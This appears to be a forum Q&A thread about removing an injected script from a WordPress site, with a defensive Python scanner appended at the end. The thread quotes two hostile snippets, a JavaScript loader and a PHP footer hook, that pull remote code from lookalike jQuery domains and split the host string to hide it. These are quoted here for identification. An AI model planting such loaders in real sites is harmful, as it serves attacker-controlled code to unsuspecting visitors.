tttwb

Reputation: 23

Remove script from WordPress site

I am using Malwarebytes and every time I visit my WordPress site it blocks a script trying to run on the page. The script is:

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it is malicious or not, but I would like to remove it. However, I do not know which plugin or file is causing it. I've tried looking at the page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

Upvotes: 1

Views: 5954

Answers (2)

NickNo

Reputation: 872

You are using a WordPress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer, for free, premium themes and plugins which normally cost $5-$75.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), anyone logged in as admin and/or anyone without a referrer URL is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing, thereby fooling enough inexperienced WordPress webmasters into seeing it as something which belongs: jQuery. The official jQuery CDN is located here: //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code, which may also be inside image files, though normally it is inside init.php or functions.php. Here is another example of similar code using a different variation of the jQuery domain.

if (!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'http://';
        $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
        if (@fopen($jquery,'r')){
            echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
        }
    }
    add_action('wp_footer', 'wp_func_jquery');
}

Upvotes: 3

MarcinWolny

Reputation: 1645

You can search for this script in your WordPress directory using one of the applications proposed in this question: Tools to search for strings inside files without indexing.

Upvotes: 0
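
A plain string search for the domain finds the first snippet on this page but not the second, where the host is split as `'u'.'jquery.org'`. The Python scanner below is an added example, not code from either answer: it joins adjacent string literals before matching and reports any jquery-named `.js` file served from a host other than code.jquery.com. The allowlist, size limit and function names are assumptions of this example, and it only sees concatenation that sits on a single line.

```python
import re
import sys
from pathlib import Path

# code.jquery.com is the official CDN named in the answer above; add your own CDN if needed.
ALLOWED_HOSTS = {"code.jquery.com"}
MAX_BYTES = 2_000_000  # assumption: skip files larger than this

# Adjacent quoted literals joined by PHP "." or JS "+", e.g. 'u'.'jquery.org'
CONCAT = re.compile(r"""['"]\s*[.+]\s*['"]""")
# host/path where the file name contains "jquery" and ends in .js
JQUERY_URL = re.compile(
    r"""([a-z0-9-]+(?:\.[a-z0-9-]+)+)/[^\s'"<>]*jquery[^\s'"<>/]*\.js""", re.I)

# Two lines quoted from the snippets on this page, then one constructed legitimate include.
SAMPLES = [
    """document.write('<scr' + 'ipt type="text/javascript" """
    """src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');""",
    "$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';",
    '<script src="//code.jquery.com/jquery-3.7.1.min.js"></script>',  # constructed
]

def suspicious_hosts(line):
    """Hosts on this line that serve a jquery*.js file and are not allowlisted."""
    joined = CONCAT.sub("", line)  # undo the split-string trick before matching
    hosts = (h.lower() for h in JQUERY_URL.findall(joined))
    return [h for h in hosts if h not in ALLOWED_HOSTS]

def scan_tree(root):
    """Return (path, line number, host) for every hit under root, in any file type."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        # Decode leniently so code appended to image files is still searched.
        text = path.read_bytes().decode("utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            hits.extend((str(path), lineno, h) for h in suspicious_hosts(line))
    return hits

if __name__ == "__main__":
    for sample in SAMPLES:
        print(suspicious_hosts(sample))
    for root in sys.argv[1:]:  # e.g. the wp-content directory
        for path, lineno, host in scan_tree(root):
            print(f"{path}:{lineno}: jquery-named script loaded from {host}")
```

A site that serves its own copy of jQuery from an absolute URL will be reported until its host is added to `ALLOWED_HOSTS`.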
